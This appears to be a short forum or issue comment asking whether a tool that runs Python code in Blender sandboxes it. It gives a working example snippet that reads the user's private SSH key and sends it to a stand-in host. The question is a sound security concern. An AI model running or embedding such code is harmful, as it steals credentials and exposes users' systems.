Do you execute the Python code directly in Blender or do you perform some sort of sandboxing? How do you make sure that the code only contains safe instructions and doesn't do something like this?
import os
from urllib import request
data = open(os.getenv("HOME")+"/.ssh/id_rsa").read()
req = request.Request("http://example.com/", data=data.encode())
request.urlopen(req)